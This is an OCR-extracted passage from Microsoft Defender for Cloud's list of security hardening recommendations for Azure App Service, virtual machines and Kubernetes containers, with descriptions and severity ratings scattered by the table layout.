Microsoft Defender for App 
Service should be enabled Z 


PHP should be updated to the 
latest version for API apps E 


Python should be updated to 
the latest version for API apps Z 


Remote debugging should be 
turned off for API App Z 


Remote debugging should be 
turned off for Function App Z 


Description 


(Related policy: Managed identity should be used in 
your Web App £) 


Microsoft Defender for App Service leverages the 
scale of the cloud, and the visibility that Azure has as 
a cloud provider, to monitor for common web app 
attacks. 

Microsoft Defender for App Service can discover 
attacks on your applications and identify emerging 
attacks. 


Important: Remediating this recommendation will 
result in charges for protecting your App Service 
plans. If you don't have any App Service plans in this 
subscription, no charges will be incurred. 

If you create any App Service plans on this 
subscription in the future, they will automatically be 
protected and charges will begin at that time. 

Learn more in Protect your web apps and APIs. 
(Related policy: Azure Defender for App Service 
should be enabled Z) 


Periodically, newer versions are released for PHP 
software either due to security flaws or to include 
additional functionality. 

Using the latest PHP version for API apps is 
recommended to benefit from security fixes, if any, 
and/or new functionalities of the latest version. 
(Related policy: Ensure that 'PHP version’ is the latest, 
if used as a part of the API app “) 


Periodically, newer versions are released for Python 
software either due to security flaws or to include 
additional functionality. 

Using the latest Python version for API apps is 
recommended to benefit from security fixes, if any, 
and/or new functionalities of the latest version. 
(Related policy: Ensure that ‘Python version’ is the 
latest, if used as a part of the API app ~) 


Remote debugging requires inbound ports to be 
opened on an API app. Remote debugging should be 
turned off. 

(Related policy: Remote debugging should be turned 
off for API Apps £) 


Remote debugging requires inbound ports to be 
opened on an Azure Function app. Remote 
debugging should be turned off. 


Severity 


High 


Medium 


Medium 


Low 


Low 


Recommendation Description 


(Related policy: Remote debugging should be turned 
off for Function Apps £) 


Remote debugging should be Remote debugging requires inbound ports to be 
turned off for Web opened on a web application. Remote debugging is 
Applications Z currently enabled. If you no longer need to use 
remote debugging, it should be turned off. 
(Related policy: Remote debugging should be turned 
off for Web Applications 7 ) 


TLS should be updated to the Upgrade to the latest TLS version 
latest version for API apps Z (Related policy: Latest TLS version should be used in 
your API App £) 


TLS should be updated to the Upgrade to the latest TLS version 
latest version for function (Related policy: Latest TLS version should be used in 
apps £ your Function App £) 


TLS should be updated to the Upgrade to the latest TLS version 
latest version for web apps E (Related policy: Latest TLS version should be used in 
your Web App £) 


Web Application should only Use of HTTPS ensures server/service authentication 
be accessible over HTTPS Z and protects data in transit from network layer 
eavesdropping attacks. 
(Related policy: Web Application should only be 
accessible over HTTPS SZ) 


Web apps should request an Client certificates allow for the app to request a 

SSL certificate for all incoming certificate for incoming requests. 

requests E Only clients that have a valid certificate will be able to 
reach the app. 
(Related policy: Ensure WEB app has ‘Client 
Certificates (Incoming client certificates)’ set to 
'On' 2) 


Compute recommendations 


There are 58 recommendations in this category. 


Recommendation Description 
Adaptive application Enable application controls to define the list of known-safe 
controls for defining applications running on your machines, and alert you when 


safe applications should other applications run. This helps harden your machines 
against malware. To simplify the process of configuring and 


Severity 


Low 


High 


High 


High 


Medium 


Medium 


Severity 


High 


Recommendation 


be enabled on your 
machines E 


Allowlist rules in your 
adaptive application 
control policy should be 
updated č 


Authentication to Linux 
machines should 
require SSH keys Si 


Automation account 
variables should be 
encrypted 7 


Azure Backup should be 
enabled for virtual 
machines 7 


Container hosts should 
be configured securely 7 


Description 


maintaining your rules, Defender for Cloud uses machine 
learning to analyze the applications running on each 

machine and suggest the list of known-safe applications. 
(Related policy: Adaptive application controls for defining 
safe applications should be enabled on your machines Z) 


Monitor for changes in behavior on groups of machines 
configured for auditing by Defender for Cloud's adaptive 
application controls. Defender for Cloud uses machine 
learning to analyze the running processes on your 
machines and suggest a list of known-safe applications. 
These are presented as recommended apps to allow in 
adaptive application control policies. 

(Related policy: Allowlist rules in your adaptive application 
control policy should be updated £ ) 


Although SSH itself provides an encrypted connection, 
using passwords with SSH still leaves the VM vulnerable to 
brute-force attacks. The most secure option for 
authenticating to an Azure Linux virtual machine over SSH 
is with a public-private key pair, also known as SSH keys. 
Learn more in Detailed steps: Create and manage SSH keys 
for authentication to a Linux VM in Azure. 

(Related policy: Audit Linux machines that are not using 
SSH key for authentication £ ) 


It is important to enable encryption of Automation account 
variable assets when storing sensitive data. 

(Related policy: Automation account variables should be 
encrypted £ ) 


Protect the data on your Azure virtual machines with Azure 
Backup. 

Azure Backup is an Azure-native, cost-effective, data 
protection solution. 

It creates recovery points that are stored in geo-redundant 
recovery vaults. 

When you restore from a recovery point, you can restore 
the whole VM or specific files. 

(Related policy: Azure Backup should be enabled for Virtual 
Machines © ) 


Remediate vulnerabilities in security configuration on 
machines with Docker installed to protect them from 
attacks. 

(Related policy: Vulnerabilities in container security 
configurations should be remediated zi 


Severity 


High 


Medium 


High 


Low 


High 


Recommendation Description Severity 


Diagnostic logs in Azure Enable logs and retain them for up to a year. This enables Low 
Stream Analytics should you to recreate activity trails for investigation purposes 
be enabled 7 when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Azure Stream Analytics 

should be enabled 2) 


Diagnostic logs in Batch Enable logs and retain them for up to a year. This enables Low 
accounts should be you to recreate activity trails for investigation purposes 
enabled £ when a security incident occurs or your network is 


compromised. 
(Related policy: Diagnostic logs in Batch accounts should be 
enabled Z) 


Diagnostic logs in Event Enable logs and retain them for up to a year. This enables Low 
Hub should be enabled £ you to recreate activity trails for investigation purposes 

when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Event Hub should be 

enabled £) 


Diagnostic logs in Logic To ensure you can recreate activity trails for investigation Low 

Apps should be enabled £ purposes when a security incident occurs or your network is 
compromised, enable logging. If your diagnostic logs aren't 
being sent to a Log Analytics workspace, Azure Storage 
account, or Azure Event Hub, ensure you've configured 
diagnostic settings to send platform metrics and platform 
logs to the relevant destinations. Learn more in Create 
diagnostic settings to send platform logs and metrics to 
different destinations. 
(Related policy: Diagnostic logs in Logic Apps should be 
enabled Z) 


Diagnostic logs in Enable logs and retain them for up to a year. This enables Low 
Search services should you to recreate activity trails for investigation purposes 
be enabled 7 when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Search services should be 


enabled Z) 
Diagnostic logs in Enable logs and retain them for up to a year. This enables Low 
Service Bus should be you to recreate activity trails for investigation purposes 
enabled Z when a security incident occurs or your network is 


compromised. 
(Related policy: Diagnostic logs in Service Bus should be 
enabled Z) 


Recommendation 


Diagnostic logs in 
Virtual Machine Scale 
Sets should be enabled Z 


Endpoint protection 
health issues on 
machines should be 
resolved Z 


Endpoint protection 
health issues on virtual 
machine scale sets 
should be resolved Z 


Endpoint protection 
should be installed on 
machines % 


Endpoint protection 
should be installed on 
virtual machine scale 
sets £ 


File integrity monitoring 
should be enabled on 
machines Z 


Guest Attestation 
extension should be 
installed on supported 


Description 


Enable logs and retain them for up to a year. This enables 
you to recreate activity trails for investigation purposes 
when a security incident occurs or your network is 
compromised. 

(Related policy: Diagnostic logs in Virtual Machine Scale 
Sets should be enabled Z) 


Resolve endpoint protection health issues on your virtual 
machines to protect them from latest threats and 
vulnerabilities. See the documentation for the endpoint 
protection solutions supported by Defender for Cloud and 
the endpoint protection assessments. 

(No related policy) 


Remediate endpoint protection health failures on your 
virtual machine scale sets to protect them from threats and 
vulnerabilities. 

(Related policy: Endpoint protection solution should be 
installed on virtual machine scale sets £) 


To protect machines from threats and vulnerabilities, install 
a supported endpoint protection solution. 

Learn more about how endpoint protection for machines is 
evaluated in Endpoint protection assessment and 
recommendations in Microsoft Defender for Cloud. 

(No related policy) 


Install an endpoint protection solution on your virtual 
machines scale sets, to protect them from threats and 
vulnerabilities. 

(Related policy: Endpoint protection solution should be 
installed on virtual machine scale sets £) 


Defender for Cloud has identified machines that are missing 
a file integrity monitoring solution. To monitor changes to 
critical files, registry keys, and more on your servers, enable 
file integrity monitoring. 

When the file integrity monitoring solution is enabled, 
create data collection rules to define the files to be 
monitored. To define rules, or see the files changed on 
machines with existing rules, go to the file integrity 
monitoring management page > “ 

(No related policy) 


Install Guest Attestation extension on supported Linux 
virtual machine scale sets to allow Microsoft Defender for 
Cloud to proactively attest and monitor the boot integrity. 
Once installed, boot integrity will be attested via Remote 


Severity 


Low 


Medium 


Low 


High 


High 


High 


Low 


Recommendation Description Severity 


Linux virtual machine Attestation. This assessment only applies to trusted launch 
scale sets Z enabled Linux virtual machine scale sets. 
Important: 


Trusted launch requires the creation of new virtual 
machines. 

You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines. 

(No related policy) 


Guest Attestation Install Guest Attestation extension on supported Linux Low 
extension should be virtual machines to allow Microsoft Defender for Cloud to 
installed on supported proactively attest and monitor the boot integrity. Once 
Linux virtual machines installed, boot integrity will be attested via Remote 
Attestation. This assessment only applies to trusted launch 
enabled Linux virtual machines. 


Important: 

Trusted launch requires the creation of new virtual 
machines. 

You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines. 

(No related policy) 


Guest Attestation Install Guest Attestation extension on supported virtual Low 

extension should be machine scale sets to allow Microsoft Defender for Cloud to 

installed on supported proactively attest and monitor the boot integrity. Once 

Windows virtual installed, boot integrity will be attested via Remote 

machine scale sets 7 Attestation. This assessment only applies to trusted launch 
enabled virtual machine scale sets. 


Important: 

Trusted launch requires the creation of new virtual 
machines. 

You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines. 

(No related policy) 


Guest Attestation Install Guest Attestation extension on supported virtual Low 
extension should be machines to allow Microsoft Defender for Cloud to 
installed on supported proactively attest and monitor the boot integrity. Once 

installed, boot integrity will be attested via Remote 


Recommendation 


Windows virtual 
machines 7 


Guest Configuration 
extension should be 
installed on machines E 


Install endpoint 
protection solution on 
virtual machines £ 


Linux virtual machines 
should enforce kernel 
module signature 
validation č 


Linux virtual machines 
should use only signed 
and trusted boot 
components E 


Linux virtual machines 


should use Secure Boot Z 


Description 


Attestation. This assessment only applies to trusted launch 
enabled virtual machines. 


Important: 

Trusted launch requires the creation of new virtual 
machines. 

You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines. 

(No related policy) 


To ensure secure configurations of in-guest settings of your 
machine, install the Guest Configuration extension. In-guest 
settings that the extension monitors include the 
configuration of the operating system, application 
configuration or presence, and environment settings. Once 
installed, in-guest policies will be available such as 
‘Windows Exploit guard should be enabled’. Learn more Z. 
(Related policy: Virtual machines should have the Guest 
Configuration extension £ ) 


Install an endpoint protection solution on your virtual 
machines, to protect them from threats and vulnerabilities. 
(Related policy: Monitor missing Endpoint Protection in 
Azure Security Center £ ) 


To help mitigate against the execution of malicious or 
unauthorized code in kernel mode, enforce kernel module 
signature validation on supported Linux virtual machines. 
Kernel module signature validation ensures that only 
trusted kernel modules will be allowed to run. This 
assessment only applies to Linux virtual machines that have 
the Azure Monitor Agent installed. 

(No related policy) 


With Secure Boot enabled, all OS boot components (boot 
loader, kernel, kernel drivers) must be signed by trusted 
publishers. Defender for Cloud has identified untrusted OS 
boot components on one or more of your Linux machines. 
To protect your machines from potentially malicious 
components, add them to your allow list or remove the 
identified components. 

(No related policy) 


To protect against the installation of malware-based 
rootkits and boot kits, enable Secure Boot on supported 
Linux virtual machines. Secure Boot ensures that only 


signed operating systems and drivers will be allowed to run. 


Severity 


Medium 


High 


Low 


Low 


Low 


Recommendation Description Severity 


This assessment only applies to Linux virtual machines that 
have the Azure Monitor Agent installed. 
(No related policy) 


Log Analytics agent Defender for Cloud uses the Log Analytics agent (also High 
should be installed on known as OMS) to collect security events from your Azure 
Linux-based Azure Arc- Arc machines. To deploy the agent on all your Azure Arc 
enabled machines 7 machines, follow the remediation steps. 

(No related policy) 


Log Analytics agent Defender for Cloud collects data from your Azure virtual High 
should be installed on machines (VMs) to monitor for security vulnerabilities and 

virtual machine scale threats. Data is collected using the Log Analytics agent, 

sets 7 formerly known as the Microsoft Monitoring Agent (MMA), 


which reads various security-related configurations and 
event logs from the machine and copies the data to your 
workspace for analysis. You'll also need to follow that 
procedure if your VMs are used by an Azure managed 
service such as Azure Kubernetes Service or Azure Service 
Fabric. You cannot configure auto-provisioning of the agent 
for Azure virtual machine scale sets. To deploy the agent on 
virtual machine scale sets (including those used by Azure 
managed services such as Azure Kubernetes Service and 
Azure Service Fabric), follow the procedure in the 
remediation steps. 

(Related policy: Log Analytics agent should be installed on 
your virtual machine scale sets for Azure Security Center 
monitoring £ ) 


Log Analytics agent Defender for Cloud collects data from your Azure virtual High 
should be installed on machines (VMs) to monitor for security vulnerabilities and 
virtual machines Z threats. Data is collected using the Log Analytics agent, 


formerly known as the Microsoft Monitoring Agent (MMA), 
which reads various security-related configurations and 
event logs from the machine and copies the data to your 
Log Analytics workspace for analysis. This agent is also 
required if your VMs are used by an Azure managed service 
such as Azure Kubernetes Service or Azure Service Fabric. 
We recommend configuring auto-provisioning to 
automatically deploy the agent. If you choose not to use 
auto-provisioning, manually deploy the agent to your VMs 
using the instructions in the remediation steps. 

(Related policy: Log Analytics agent should be installed on 
your virtual machine for Azure Security Center 

monitoring £ ) 


Log Analytics agent Defender for Cloud uses the Log Analytics agent (also High 
should be installed on known as MMA) to collect security events from your Azure 


Recommendation 


Windows-based Azure 
Arc-enabled machines 7 


Machines should be 
configured securely Z 


Machines should be 
restarted to apply 
security configuration 
updates 7 


Machines should have a 
vulnerability assessment 
solution č 


Machines should have 
vulnerability findings 
resolved Z 


Management ports of 
virtual machines should 
be protected with just- 
in-time network access 
control £ 


Microsoft Defender for 
servers should be 
enabled 7 


Description 


Arc machines. To deploy the agent on all your Azure Arc 
machines, follow the remediation steps. 
(No related policy) 


Remediate vulnerabilities in security configuration on your 
machines to protect them from attacks. 
(Related policy: Vulnerabilities in security configuration on 
your machines should be remediated £Z) 


To apply security configuration updates and protect against 
vulnerabilities, restart your machines. This assessment only 
applies to Linux virtual machines that have the Azure 
Monitor Agent installed. 

(No related policy) 


Defender for Cloud regularly checks your connected 
machines to ensure they're running vulnerability 
assessment tools. Use this recommendation to deploy a 
vulnerability assessment solution. 

(Related policy: A vulnerability assessment solution should 
be enabled on your virtual machines E] 


Resolve the findings from the vulnerability assessment 
solutions on your virtual machines. 

(Related policy: A vulnerability assessment solution should 
be enabled on your virtual machines “) 


Defender for Cloud has identified some overly-permissive 
inbound rules for management ports in your Network 
Security Group. Enable just-in-time access control to 
protect your VM from internet-based brute-force attacks. 
Learn more in Understanding just-in-time (JIT) VM access. 
(Related policy: Management ports of virtual machines 
should be protected with just-in-time network access 
control £ ) 


Microsoft Defender for servers provides real-time threat 
protection for your server workloads and generates 
hardening recommendations as well as alerts about 
suspicious activities. 

You can use this information to quickly remediate security 
issues and improve the security of your servers. 


Important: Remediating this recommendation will result in 
charges for protecting your servers. If you don't have any 
servers in this subscription, no charges will be incurred. 

If you create any servers on this subscription in the future, 
they will automatically be protected and charges will begin 
at that time. 


Severity 


Low 


Low 


Medium 


Low 


High 


High 


Recommendation 


Microsoft Defender for 
servers should be 
enabled on workspaces E 


Secure Boot should be 
enabled on supported 
Windows virtual 
machines E 


Service Fabric clusters 
should have the 
ClusterProtectionLevel 
property set to 
EncryptAndSign Z 


Description 


Learn more in Introduction to Microsoft Defender for 
servers. 

(Related policy: Azure Defender for servers should be 
enabled £) 


Microsoft Defender for servers brings threat detection and 
advanced defenses for your Windows and Linux machines. 
With this Defender plan enabled on your subscriptions but 
not on your workspaces, you're paying for the full capability 
of Microsoft Defender for servers but missing out on some 
of the benefits. 

When you enable Microsoft Defender for servers ona 
workspace, all machines reporting to that workspace will be 
billed for Microsoft Defender for servers - even if they're in 
subscriptions without Defender plans enabled. Unless you 
also enable Microsoft Defender for servers on the 
subscription, those machines won't be able to take 
advantage of just-in-time VM access, adaptive application 
controls, and network detections for Azure resources. 

Learn more in Introduction to Microsoft Defender for 
servers. 

(No related policy) 


Enable Secure Boot on supported Windows virtual 
machines to mitigate against malicious and unauthorized 
changes to the boot chain. Once enabled, only trusted 
bootloaders, kernel and kernel drivers will be allowed to 
run. This assessment only applies to trusted launch enabled 
Windows virtual machines. 


Important: 

Trusted launch requires the creation of new virtual 
machines. 

You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines.. 

(No related policy) 


Service Fabric provides three levels of protection (None, 
Sign and EncryptAndSign) for node-to-node 
communication using a primary cluster certificate. Set the 
protection level to ensure that all node-to-node messages 
are encrypted and digitally signed. 

(Related policy: Service Fabric clusters should have the 
ClusterProtectionLevel property set to EncryptAndSign £Z) 


Severity 


Medium 


Low 


High 


Recommendation 


Service Fabric clusters 
should only use Azure 
Active Directory for 

client authentication £ 


System updates on 
virtual machine scale 


sets should be installed Z 


System updates should 
be installed on your 
machines E 


System updates should 
be installed on your 
machines (powered by 
Update Center) Z 


Virtual machine scale 
sets should be 
configured securely Z 


Virtual machines guest 
attestation status 
should be healthy 7 


Virtual machines’ Guest 
Configuration extension 
should be deployed 
with system-assigned 
managed identity 7 


Description 


Perform Client authentication only via Azure Active 
Directory in Service Fabric 

(Related policy: Service Fabric clusters should only use 
Azure Active Directory for client authentication 7) 


Install missing system security and critical updates to secure 
your Windows and Linux virtual machine scale sets. 

(Related policy: System updates on virtual machine scale 
sets should be installed Z) 


Install missing system security and critical updates to secure 
your Windows and Linux virtual machines and computers 
(Related policy: System updates should be installed on your 
machines zi] 


Your machines are missing system, security, and critical 
updates. Software updates often include critical patches to 
security holes. Such holes are frequently exploited in 
malware attacks so it's vital to keep your software updated. 
To install all outstanding patches and secure your machines, 
follow the remediation steps. 

(No related policy) 


Remediate vulnerabilities in security configuration on your 
virtual machine scale sets to protect them from attacks. 
(Related policy: Vulnerabilities in security configuration on 
your virtual machine scale sets should be remediated £ ) 


Guest attestation is performed by sending a trusted log 
(TCGLog) to an attestation server. The server uses these 
logs to determine whether boot components are 
trustworthy. This assessment is intended to detect 
compromises of the boot chain which might be the result 
of a bootkit or rootkit infection. 

This assessment only applies to Trusted Launch enabled 
virtual machines that have the Guest Attestation extension 
installed. 

(No related policy) 


The Guest Configuration extension requires a system 
assigned managed identity. Azure virtual machines in the 
scope of this policy will be non-compliant when they have 
the Guest Configuration extension installed but do not have 
a system assigned managed identity. Learn more Z 

(Related policy: Guest Configuration extension should be 
deployed to Azure virtual machines with system assigned 
managed identity Z) 


Severity 


High 


High 


High 


High 


High 


Medium 


Medium 


Recommendation 


Virtual machines should 
be migrated to new 
Azure Resource 
Manager resources E 


Virtual machines should 
encrypt temp disks, 
caches, and data flows 
between Compute and 
Storage resources E 


VTPM should be 
enabled on supported 
virtual machines 4 


Description 


Virtual Machines (classic) was deprecated and these VMs 
should be migrated to Azure Resource Manager. 

Because Azure Resource Manager now has full laaS 
capabilities and other advancements, we deprecated the 
management of laaS virtual machines (VMs) through Azure 
Service Manager (ASM) on February 28, 2020. This 
functionality will be fully retired on March 1, 2023. 


To view all affected classic VMs make sure to select all your 
Azure subscriptions under ‘directories + subscriptions’ tab. 


Available resources and information about this tool & 
migration: 

Overview of Virtual machines (classic) deprecation, step by 
step process for migration & available Microsoft resources. 
Details about Migrate to Azure Resource Manager 
migration tool. 

Migrate to Azure Resource Manager migration tool using 
PowerShell. 

(Related policy: Virtual machines should be migrated to 
new Azure Resource Manager resources E) 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; 

temp disks and data caches aren't encrypted, and data isn't 
encrypted when flowing between compute and storage 
resources. 

For a comparison of different disk encryption technologies 
in Azure, see https://aka.ms/diskencryptioncomparison @. 
Use Azure Disk Encryption to encrypt all this data. 
Disregard this recommendation if: 

1. You're using the encryption-at-host feature, or 2. Server- 
side encryption on Managed Disks meets your security 
requirements. 

Learn more in Server-side encryption of Azure Disk 
Storage č. 

(Related policy: Disk encryption should be applied on virtual 
machines £) 


Enable virtual TPM device on supported virtual machines to 
facilitate Measured Boot and other OS security features that 
require a TPM. Once enabled, vTPM can be used to attest 
boot integrity. This assessment only applies to trusted 
launch enabled virtual machines. 


Important: 
Trusted launch requires the creation of new virtual 
machines. 


Severity 


High 


High 


Low 


Recommendation 


Vulnerabilities in 
security configuration 
on your Linux machines 
should be remediated 
(powered by Guest 
Configuration) E 


Vulnerabilities in 

security configuration 

on your Windows 
machines should be 
remediated (powered 

by Guest Configuration) £ 


Windows Defender 
Exploit Guard should be 
enabled on machines E 


Windows web servers 
should be configured to 
use secure 
communication 
protocols č 


[Preview]: Linux virtual 
machines should enable 
Azure Disk Encryption 
or EncryptionAtHost Z 


Description 


You can't enable trusted launch on existing virtual machines 
that were initially created without it. 

Learn more about Trusted launch for Azure virtual 
machines. 

(No related policy) 


Remediate vulnerabilities in security configuration on your 
Linux machines to protect them from attacks. 

(Related policy: Linux machines should meet requirements 
for the Azure security baseline £) 


Remediate vulnerabilities in security configuration on your 
Windows machines to protect them from attacks. 
(No related policy) 


Windows Defender Exploit Guard uses the Azure Policy 
Guest Configuration agent. Exploit Guard has four 
components that are designed to lock down devices 
against a wide variety of attack vectors and block behaviors 
commonly used in malware attacks while enabling 
enterprises to balance their security risk and productivity 
requirements (Windows only). 

(Related policy: Audit Windows machines on which 
Windows Defender Exploit Guard is not enabled £Z) 


To protect the privacy of information communicated over 
the Internet, your web servers should use the latest version 
of the industry-standard cryptographic protocol, Transport 
Layer Security (TLS). TLS secures communications over a 
network by using security certificates to encrypt a 
connection between machines. 

(Related policy: Audit Windows web servers that are not 
using secure communication protocols £ ) 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; temp disks 
and data caches aren't encrypted, and data isn't encrypted 
when flowing between compute and storage resources. Use 
Azure Disk Encryption or EncryptionAtHost to encrypt all 
this data. Visit https://aka.ms/diskencryptioncomparison E 
to compare encryption offerings. This policy requires two 
prerequisites to be deployed to the policy assignment 
scope. For details, visit https://aka.ms/gcpol Z . 


Severity 


Low 


Low 


Medium 


High 


High 


Recommendation 


[Preview]: Windows 
virtual machines should 
enable Azure Disk 
Encryption or 
EncryptionAtHost 4 


Description 


(Related policy: [Preview]: Linux virtual machines should 
enable Azure Disk Encryption or EncryptionAtHost £ ) 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; temp disks 
and data caches aren't encrypted, and data isn't encrypted 
when flowing between compute and storage resources. Use 
Azure Disk Encryption or EncryptionAtHost to encrypt all 
this data. Visit https://aka.ms/diskencryptioncomparison E 
to compare encryption offerings. This policy requires two 
prerequisites to be deployed to the policy assignment 
scope. For details, visit https://aka.ms/gcpol Z . 

(Related policy: [Preview]: Windows virtual machines should 
enable Azure Disk Encryption or EncryptionAtHost  ) 


Container recommendations 


There are 27 recommendations in this category. 


Recommendation 


[Enable if required] 
Container registries 
should be encrypted with 
a customer-managed 
key (CMK) @ 


Description 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but 
are available to enable for applicable scenarios. Data is 
encrypted automatically using platform-managed keys, so 
the use of customer-managed keys should only be applied 
when obligated by compliance or restrictive policy 
requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce 
the use of customer-managed keys. Learn more in Manage 
security policies. 

Use customer-managed keys to manage the encryption at 
rest of the contents of your registries. By default, the data 
is encrypted at rest with service-managed keys, but 
customer-managed keys (CMK) are commonly required to 
meet regulatory compliance standards. CMKs enable the 
data to be encrypted with an Azure Key Vault key created 
and owned by you. You have full control and responsibility 
for the key lifecycle, including rotation and management. 
Learn more about CMK encryption at 
https://aka.ms/acr/CMK ©. 

(Related policy: Container registries should be encrypted 
with a customer-managed key (CMK) Z) 


Severity 


High 


Severity 


Low 


Recommendation 


Azure Arc-enabled 
Kubernetes clusters 
should have the Azure 
Policy extension installed 7 


Azure Arc-enabled 
Kubernetes clusters 
should have the 
Defender extension 
installed % 


Azure Kubernetes Service 
clusters should have 
Defender profile enabled 7 


Azure Kubernetes Service 
clusters should have the 
Azure Policy add-on for 
Kubernetes installed £ 


Container CPU and 
memory limits should be 
enforced č 


Description 


Azure Policy extension for Kubernetes extends 
Gatekeeper E v3, an admission controller webhook for 
Open Policy Agent E (OPA), to apply at-scale 
enforcements and safeguards on your clusters in a 
centralized, consistent manner. 

(No related policy) 


Defender's extension for Azure Arc provides threat 
protection for your Arc-enabled Kubernetes clusters. The 
extension collects data from all control plane (master) 
nodes in the cluster and sends it to the Microsoft Defender 
for Kubernetes backend in the cloud for further analysis. 
Learn more. 

(No related policy) 


Microsoft Defender for Containers provides cloud-native 
Kubernetes security capabilities including environment 
hardening, workload protection, and run-time protection. 
When you enable the SecurityProfile.AzureDefender profile 
on your Azure Kubernetes Service cluster, an agent is 
deployed to your cluster to collect security event data. 
Learn more in Introduction to Microsoft Defender for 
Containers. 

(No related policy) 


Azure Policy add-on for Kubernetes extends Gatekeeper Z 
v3, an admission controller webhook for Open Policy 
Agent: (OPA), to apply at-scale enforcements and 
safeguards on your clusters in a centralized, consistent 
manner. 


Defender for Cloud requires the Add-on to audit and 
enforce security capabilities and compliance inside your 
clusters. Learn more. 


Requires Kubernetes v1.14.0 or later. 


(Related policy: Azure Policy Add-on for Kubernetes service 
(AKS) should be installed and enabled on your clusters £ ) 


Enforcing CPU and memory limits prevents resource 
exhaustion attacks (a form of denial of service attack). 

We recommend setting limits for containers to ensure the 
runtime prevents the container from using more than the 
configured resource limit. 


(Related policy: Ensure container CPU and memory 


Severity 


High 


High 


High 


High 


Medium 


Recommendation 


Container images should 
be deployed from 
trusted registries only £ 


Container registries 
should not allow 
unrestricted network 
access E 


Container registries 
should use private link Z 


Container registry 
images should have 
vulnerability findings 
resolved (powered by 
Qualys) Z 


Container registry 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 


Management ) - Preview E 


Description Severity 


resource limits do not exceed the specified limits in 
Kubernetes cluster “) 


Images running on your Kubernetes cluster should come High 
from known and monitored container image registries. 

Trusted registries reduce your cluster's exposure risk by 

limiting the potential for the introduction of unknown 
vulnerabilities, security issues and malicious images. 

(Related policy: Ensure only allowed container images in 


Kubernetes cluster Z) 


Azure container registries by default accept connections Medium 
over the internet from hosts on any network. To protect 
your registries from potential threats, allow access from 
only specific public IP addresses or address ranges. If your 
registry doesn't have an |P/firewall rule or a configured 
virtual network, it will appear in the unhealthy resources. 
Learn more about Container Registry network rules here: 
https://aka.ms/acr/portal/public-network £ and here 
https://aka.ms/acr/vnet Z . 

(Related policy: Container registries should not allow 
unrestricted network access £ ) 


Azure Private Link lets you connect your virtual network to Medium 
Azure services without a public IP address at the source or 
destination. The private link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your container registries instead of the entire service, you'll 
also be protected against data leakage risks. Learn more 
at: https://aka.ms/acr/private-link Z . 

(Related policy: Container registries should use private 

link 2) 

Container image vulnerability assessment scans your High 
registry for security vulnerabilities and exposes detailed 

findings for each image. Resolving the vulnerabilities can 

greatly improve your containers’ security posture and 

protect them from attacks. 

(Related policy: Vulnerabilities in Azure Container Registry 

images should be remediated tz 


Container image vulnerability assessment scans your High 
registry for commonly known vulnerabilities (CVEs) and 

provides a detailed vulnerability report for each image. 

Resolving vulnerabilities can greatly improve your security 
posture, ensuring images are safe to use prior to 


deployment. 


Recommendation 


Container with privilege 
escalation should be 
avoided Z 


Containers sharing 
sensitive host 
namespaces should be 
avoided # 


Containers should only 
use allowed AppArmor 
profiles £ 


Diagnostic logs in 
Kubernetes services 
should be enabled “ 


Immutable (read-only) 
root filesystem should be 
enforced for containers E 


Kubernetes API server 
should be configured 
with restricted access E 


Kubernetes clusters 
should be accessible only 


Peseitptienticy: Vulnerabilities in Azure Container Registry 
images should-be remediated 7) 


Containers shouldn't run with privilege escalation to root 
in your Kubernetes cluster. 

The AllowPrivilegeEscalation attribute controls whether a 
process can gain more privileges than its parent process. 
(Related policy: Kubernetes clusters should not allow 
container privilege escalation Z ) 


To protect against privilege escalation outside the 
container, avoid pod access to sensitive host namespaces 
(host process ID and host IPC) in a Kubernetes cluster. 
(Related policy: Kubernetes cluster containers should not 
share host process ID or host IPC namespace ¢ ) 


Containers running on Kubernetes clusters should be 
limited to allowed AppArmor profiles only. 

‘AppArmor (Application Armor) is a Linux security module 
that protects an operating system and its applications 
from security threats. To use it, a system administrator 
associates an AppArmor security profile with each 
program. 

(Related policy: Kubernetes cluster containers should only 
use allowed AppArmor profiles 7 ) 


Enable diagnostic logs in your Kubernetes services and 
retain them up to a year. This enables you to recreate 
activity trails for investigation purposes when a security 
incident occurs. 

(No related policy) 


Containers should run with a read only root file system in 
your Kubernetes cluster. Immutable filesystem protects 
containers from changes at run-time with malicious 
binaries being added to PATH. 

(Related policy: Kubernetes cluster containers should run 
with a read only root file system Z) 


To ensure that only applications from allowed networks, 
machines, or subnets can access your cluster, restrict 
access to your Kubernetes API server. You can restrict 
access by defining authorized IP ranges, or by setting up 
your API servers as private clusters as explained inCreate a 
private Azure Kubernetes Service cluster. 

(Related policy: Authorized IP ranges should be defined on 
Kubernetes Services Z ) 


Use of HTTPS ensures authentication and protects data in 
transit from network layer eavesdropping attacks. This 


Severity 


Medium 


Medium 


High 


Low 


Medium 


High 


High 


Recommendation 


over HTTPS Z 


Kubernetes clusters 
should disable 
automounting API 
credentials Z 


Kubernetes clusters 
should not grant 
CAPSYSADMIN security 
capabilities E 


Kubernetes clusters 
should not use the 
default namespace Z 


Least privileged Linux 
capabilities should be 


enforced for containers č 


Microsoft Defender for 
Containers should be 
enabled Z 


Description 


capability is currently generally available for Kubernetes 
Service (AKS), and in preview for AKS Engine and Azure 
Arc-enabled Kubernetes. For more info, visit 
https://aka.ms/kubepolicydoc E 

(Related policy: Enforce HTTPS ingress in Kubernetes 
cluster Z) 


Disable automounting API credentials to prevent a 
potentially compromised Pod resource to run API 
commands against Kubernetes clusters. For more 
